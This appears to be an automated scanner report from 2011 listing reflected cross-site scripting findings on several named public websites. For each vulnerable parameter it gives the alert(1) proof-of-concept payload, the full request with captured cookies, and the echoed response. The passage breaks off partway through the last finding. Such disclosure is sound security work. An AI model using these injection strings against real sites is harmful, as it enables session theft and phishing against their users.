XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10172011-01

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. https://accounts.zoho.com/register [css parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	https://accounts.zoho.com
Path:	/register

Issue detail

The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25792"style%3d"x%3aexpression(alert(1))"7cd8de71c68 was submitted in the css parameter. This input was echoed as 25792"style="x:expression(alert(1))"7cd8de71c68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /register?servicename=ZohoCRM&showheader=false&serviceurl=https%3A%2F%2Fzoho.com%2Fcrm%2Flp%2Fsignup-redirect.html&showGoogleYahoo=false&css=https://www.zoho.com/crm/theme/signup2.css25792"style%3d"x%3aexpression(alert(1))"7cd8de71c68 HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1546431367.1318880860.1318880860.1318880860.1; __utmb=1.2.9.1318880868281; __utmc=1; __utmz=1.1318880860.1.1.utmcsr=getapp.com|utmccn=(referral)|utmcmd=referral|utmcct=/gaxc.php

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 17 Oct 2011 19:49:57 GMT
Server: ZWS
Strict-Transport-Security: max-age=604800
Content-Length: 37573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">

<html>
<head>
<title>Create New Account</title>

<script
...[SNIP]...
<link href="https://www.zoho.com/crm/theme/signup2.css25792"style="x:expression(alert(1))"7cd8de71c68" type="text/css" rel="stylesheet" />
...[SNIP]...

1.2. http://failbook.failblog.org/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://failbook.failblog.org
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9531d"><script>alert(1)</script>4dd0aba29c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9531d\"><script>alert(1)</script>4dd0aba29c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9531d"><script>alert(1)</script>4dd0aba29c=1 HTTP/1.1
Host: failbook.failblog.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1393588674-1318814090703; __utma=1.652424973.1318814092.1318814092.1318814092.1; __utmz=1.1318814092.1.1.utmcsr=icanhascheezburger.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 17 Oct 2011 19:38:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://failbook.failblog.org/xmlrpc.php
Link: <http://wp.me/MbUR>; rel=shortlink
Content-Length: 105339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xmlns:fb="http:
...[SNIP]...
<a class="navi" href="http://failbook.failblog.org/page/2/?9531d\"><script>alert(1)</script>4dd0aba29c=1">
...[SNIP]...

1.3. http://fiveminutegetaway.icanhascheezburger.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fiveminutegetaway.icanhascheezburger.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced4d"><script>alert(1)</script>bf839a97d30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ced4d\"><script>alert(1)</script>bf839a97d30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ced4d"><script>alert(1)</script>bf839a97d30=1 HTTP/1.1
Host: fiveminutegetaway.icanhascheezburger.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2015719681-1318814064359; tdsu_date=10/16/2011; tdsu_views=2; __utma=1.582518482.1318814066.1318814066.1318814066.1; __utmz=1.1318814066.1.1.utmcsr=blog.cheezburger.com|utmccn=(referral)|utmcmd=referral|utmcct=/; tdsu_state=redisplay

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 17 Oct 2011 19:41:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://fiveminutegetaway.icanhascheezburger.com/xmlrpc.php
Link: <http://wp.me/1McGd>; rel=shortlink
Content-Length: 105930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xmlns:fb="http:
...[SNIP]...
<a class="navi" href="http://fiveminutegetaway.icanhascheezburger.com/page/2/?ced4d\"><script>alert(1)</script>bf839a97d30=1">
...[SNIP]...

1.4. http://www.decide.com/search [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.decide.com
Path:	/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 73a30<script>alert(1)</script>d2ed23e0d41 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q=phones73a30<script>alert(1)</script>d2ed23e0d41&o=0&c=20&f=&s=RELEVANCE&src=xhr&act=search&&d=true HTTP/1.1
Host: www.decide.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.decide.com/search/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-210324657-1318813791662; mp_super_properties=%7B%22all%22%3A%20%7B%22%24initial_referrer%22%3A%20%22http%3A//www.madrona.com/venture-capital-investments/portfolio-company.asp%3Fname%3DDecide%26company%3D58%22%2C%22%24initial_referring_domain%22%3A%20%22www.madrona.com%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D; posterous_mp=%7B%22all%22%3A%20%7B%22%24initial_referrer%22%3A%20%22http%3A//www.madrona.com/venture-capital-investments/portfolio-company.asp%3Fname%3DDecide%26company%3D58%22%2C%22%24initial_referring_domain%22%3A%20%22www.madrona.com%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Other%20%28mozilla/5.0%20%28compatible%3B%20rogerbot/1.0%3B%20http%3A//www.seomoz.org/dp/rogerbot%29%29%22%2C%22user%22%3A%20%22%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D; AWSELB=758B6F670E877E60D5F54BEEB433797CA648B449EC7A46596C3523A0DC0EF640CCB338B04F913BE7D3D7352D1215A35BBF59C2E021ACFAFCD677332939A13465371B925F4D; udc=eyJrZXkiOm51bGwsImxvY2F0aW9uIjpudWxsLCJpZCI6IjA3NzI0NTllLWQ5MjYtNDlkMi1iMzdmLTE3MWJiZTBjMjJmOSIsImxhc3RTZWVuIjoxMzE4ODgwMzA3MjI0LCJzZXR0aW5ncyI6e319; tid=24047ff6c76b68f2-2c6de647d0edaf5f-2c6de647d0edaf5f; __utma=1.180661997.1318814158.1318814158.1318880333.2; __utmb=1.2.10.1318880333; __utmc=1; __utmz=1.1318814158.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0
Content-Language: en-US
Content-Type: application/json;charset=UTF-8
Date: Mon, 17 Oct 2011 19:40:14 GMT
ETag: "0eedcc139ed5af26afb2a4ba967ce7790"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: udc=eyJrZXkiOm51bGwsImxvY2F0aW9uIjpudWxsLCJpZCI6IjA3NzI0NTllLWQ5MjYtNDlkMi1iMzdmLTE3MWJiZTBjMjJmOSIsImxhc3RTZWVuIjoxMzE4ODgwNDE0NDA2LCJzZXR0aW5ncyI6e319; Expires=Sun, 15-Jan-2012 19:40:14 GMT; Path=/
Set-Cookie: tid=24047ff6c76b68f2-6b722ae898ac8e93-6b722ae898ac8e93; Version=1; Max-Age=1200; Expires=Mon, 17-Oct-2011 20:00:14 GMT; Path=/
Content-Length: 574
Connection: keep-alive

{"bypassQueryPath":null,"bypassQueryCategory":null,"resultCount":0,"stats":{},"query":"phones73a30<script>alert(1)</script>d2ed23e0d41","facets":{"empty":false,"facets":{"price":{"facetName":"price","selectedValues":[],"facetValues":[],"facetType":"MONEY","categorySpecific":false,"selectedValue":null}},"orderedFacets":[{"facetName":"
...[SNIP]...

1.5. http://www.getapp.com/gaxc.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.getapp.com
Path:	/gaxc.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a09d6'%3balert(1)//c1dd3dfb7d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a09d6';alert(1)//c1dd3dfb7d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /gaxc.php?x=zoho-crm-applica/a09d6'%3balert(1)//c1dd3dfb7d2tion HTTP/1.1
Host: www.getapp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.getapp.com/top-apps
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CAKEPHP=6sn47bn5l372u6moj10f2tu3m7; wooTracker=W5B902YO2JHQJWPI2WEXKEKDS0VC8NF3; __unam=6cbec6f-1330f8727f6-26bc7dbe-1; is_returning=1; wooMeta=MzM2NDA2JjMmMTImMTQxODI4MyYxMzE4ODE1MTc4OTE5JjEzMTg4ODA4MDU4MDAmJjEwMCYmNTAwMjkwJiYmJg==; __utma=138761509.1636360610.1318815197.1318815197.1318880406.2; __utmb=138761509.4.9.1318880851725; __utmc=138761509; __utmz=138761509.1318815197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 17 Oct 2011 19:47:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Vary: Accept-Encoding
Content-Length: 864

<html>
<head><script type="text/javascript"> function r(s,src) { pageTracker._trackPageview('/listings/out//zoho-crm-applica/a09d6';alert(1)//c1dd3dfb7d2tion'); setTimeout('window.location="/listings/out/' + s + src + '"', 100); } </script>
...[SNIP]...

1.6. http://www.getapp.com/gaxc.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.getapp.com
Path:	/gaxc.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cedff"><script>alert(1)</script>9a5042c804 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gaxc.php?x=zoho-crm-applica/cedff"><script>alert(1)</script>9a5042c804tion HTTP/1.1
Host: www.getapp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.getapp.com/top-apps
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CAKEPHP=6sn47bn5l372u6moj10f2tu3m7; wooTracker=W5B902YO2JHQJWPI2WEXKEKDS0VC8NF3; __unam=6cbec6f-1330f8727f6-26bc7dbe-1; is_returning=1; wooMeta=MzM2NDA2JjMmMTImMTQxODI4MyYxMzE4ODE1MTc4OTE5JjEzMTg4ODA4MDU4MDAmJjEwMCYmNTAwMjkwJiYmJg==; __utma=138761509.1636360610.1318815197.1318815197.1318880406.2; __utmb=138761509.4.9.1318880851725; __utmc=138761509; __utmz=138761509.1318815197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 17 Oct 2011 19:47:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Vary: Accept-Encoding
Content-Length: 892

<html>
<head><script type="text/javascript"> function r(s,src) { pageTracker._trackPageview('/listings/out//zoho-crm-applica/cedff"><script>alert(1)</script>9a5042c804tion'); setTimeout('window.locati
...[SNIP]...
<body onload="r('zoho-crm-applica/cedff"><script>alert(1)</script>9a5042c804tion', '')">
...[SNIP]...

1.7. http://www.getapp.com/gaxc.php [x parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.getapp.com
Path:	/gaxc.php

Issue detail

The value of the x request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ae81'%3balert(1)//faa967cb769 was submitted in the x parameter. This input was echoed as 5ae81';alert(1)//faa967cb769 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /gaxc.php?x=zoho-crm-application5ae81'%3balert(1)//faa967cb769 HTTP/1.1
Host: www.getapp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.getapp.com/top-apps
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CAKEPHP=6sn47bn5l372u6moj10f2tu3m7; wooTracker=W5B902YO2JHQJWPI2WEXKEKDS0VC8NF3; __unam=6cbec6f-1330f8727f6-26bc7dbe-1; is_returning=1; wooMeta=MzM2NDA2JjMmMTImMTQxODI4MyYxMzE4ODE1MTc4OTE5JjEzMTg4ODA4MDU4MDAmJjEwMCYmNTAwMjkwJiYmJg==; __utma=138761509.1636360610.1318815197.1318815197.1318880406.2; __utmb=138761509.4.9.1318880851725; __utmc=138761509; __utmz=138761509.1318815197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 17 Oct 2011 19:47:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Vary: Accept-Encoding
Content-Length: 862

<html>
<head><script type="text/javascript"> function r(s,src) { pageTracker._trackPageview('/listings/out//zoho-crm-application5ae81';alert(1)//faa967cb769'); setTimeout('window.location="/listings/out/' + s + src + '"', 100); } </script>
...[SNIP]...

1.8. http://www.getapp.com/gaxc.php [x parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.getapp.com
Path:	/gaxc.php

Issue detail

The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f85e5"><script>alert(1)</script>3e49d60af19 was submitted in the x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gaxc.php?x=zoho-crm-applicationf85e5"><script>alert(1)</script>3e49d60af19 HTTP/1.1
Host: www.getapp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.getapp.com/top-apps
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CAKEPHP=6sn47bn5l372u6moj10f2tu3m7; wooTracker=W5B902YO2JHQJWPI2WEXKEKDS0VC8NF3; __unam=6cbec6f-1330f8727f6-26bc7dbe-1; is_returning=1; wooMeta=MzM2NDA2JjMmMTImMTQxODI4MyYxMzE4ODE1MTc4OTE5JjEzMTg4ODA4MDU4MDAmJjEwMCYmNTAwMjkwJiYmJg==; __utma=138761509.1636360610.1318815197.1318815197.1318880406.2; __utmb=138761509.4.9.1318880851725; __utmc=138761509; __utmz=138761509.1318815197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 17 Oct 2011 19:47:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Vary: Accept-Encoding
Content-Length: 892

<html>
<head><script type="text/javascript"> function r(s,src) { pageTracker._trackPageview('/listings/out//zoho-crm-applicationf85e5"><script>alert(1)</script>3e49d60af19'); setTimeout('window.locati
...[SNIP]...
<body onload="r('zoho-crm-applicationf85e5"><script>alert(1)</script>3e49d60af19', '')">
...[SNIP]...

1.9. http://www.lijit.com/blog_wijits [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/blog_wijits

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f967b"><script>alert(1)</script>53438fd5b76 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog_wijits?json=0&id=trakrf967b"><script>alert(1)</script>53438fd5b76&uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2F&js=1 HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://fiveminutegetaway.icanhascheezburger.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; OABLOCK=787.1318813997_785.1318880280_1258.1318880317_3747.1318880285; OACAP=785.6_3841.1_787.7_1258.2_3747.1; OASCAP=785.2_3747.1_1258.1; ljt_reader=9a524261efe1e1588396f48f16471b3c

Response

HTTP/1.1 404 Not Found
Date: Mon, 17 Oct 2011 19:42:02 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n1), ms sea-ag1-n1 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 10484
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: user=deleted; expires=Sun, 17-Oct-2010 19:42:01 GMT; path=/; domain=.lijit.com
Set-Cookie: user=deleted; expires=Sun, 17-Oct-2010 19:42:01 GMT; path=/; domain=.lijit.com
Set-Cookie: kohanasession=5bgib2vmj2gr1at0bd5ancerg2; path=/; domain=.lijit.com
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiI1YmdpYjJ2bWoyZ3IxYXQwYmQ1YW5jZXJnMiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e31sYXN0X2FjdGl2aXR5fGk6MTMxODg4MDUyMjs%3D; path=/; domain=.lijit.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Lij
...[SNIP]...
<input type="hidden" name="destination" value="/blog_wijits?json=0&id=trakrf967b"><script>alert(1)</script>53438fd5b76&uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2F&js=1" />
...[SNIP]...

1.10. http://www.lijit.com/delivery/fp [n parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/fp

Issue detail

The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5560"%3balert(1)//dd9ec51666c was submitted in the n parameter. This input was echoed as f5560";alert(1)//dd9ec51666c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /delivery/fp?u=buddytv&i=lijit_region_57615&z=57615&n=1f5560"%3balert(1)//dd9ec51666c HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.buddytv.com/ads2/GAM-Deluxe-728x90_Top.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; OABLOCK=787.1318813997_785.1318814029; ljt_ts=t=1318814043061828; OACAP=785.4_3841.1_787.7; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[1258]=1; _OABLOCK[1258]=1318814747; tpro=eJyVUkFuwyAQ%2FMueUQoGHMf3HvuCtkIIYxvJBgtIpSry37vgNurVt5lldncGeMAWw%2BgWC%2F0DJusHGwtadanQi2gIjPaPyW4noKeq5Yo1WCPAEF0P1Ckuiu7GCHCpxK0Q2hGQVG3LPVXa4IyoTR1i9N1Aj2o9RqXXOkUnp31Fs0tbBSHPxRbFTjO7ZYjWl24f6rIbgW97zGaocN6EtU6nitNSZgLtUNVWgoFaqhg9CDKET3OClxVhWewR0gdfg3Pxr0wvbUtginpQyczFFjYll4uH90dF0MObHZz%2BeHn12casnV%2Btz4DpMublrOuYaCVuO6G%2F8rP67pxeyHN6yfbP5%2BPgn8mu3PvvaXOVBNYwKBPu2Nkj%2B7IxuYBPB%2BxCYd9%2FAAI%2BubU%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:38:38 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n1), ms sea-ag1-n1 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Mon, 17 Oct 2011 21:38:38 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 18348

var LJT_AdChoices = {
   img1: 'http://www.lijit.com/___leviathan_a18/res/images/adchoices/adChoicesSmall_icon.png',
   img2: 'http://www.lijit.com/___leviathan_a18/res/images/adchoices/adChoicesBig_icon.
...[SNIP]...
t Time String', e);
       return "00:00:00";
   }
}

try{
   // Settings: Change these values on a per user basis
   var lwp_ad_username = "buddytv";
   var lwp_ad_zoneid = ljt_getZoneID();
   var lwp_ad_numads = "1f5560";alert(1)//dd9ec51666c";
   var lwp_ad_premium = "1";// or 0 for non-premium ad
   var lwp_ad_eleid = "lijit_region_57615";
   var lwp_method = "regex";
   var lwp_referring_search = getReferringSearch(document.referrer);

   var lw
...[SNIP]...

1.11. http://www.lijit.com/delivery/serp [ad_hint parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/serp

Issue detail

The value of the ad_hint request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cd63"%3balert(1)//f6687a8b1ac was submitted in the ad_hint parameter. This input was echoed as 8cd63";alert(1)//f6687a8b1ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=8cd63"%3balert(1)//f6687a8b1ac&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
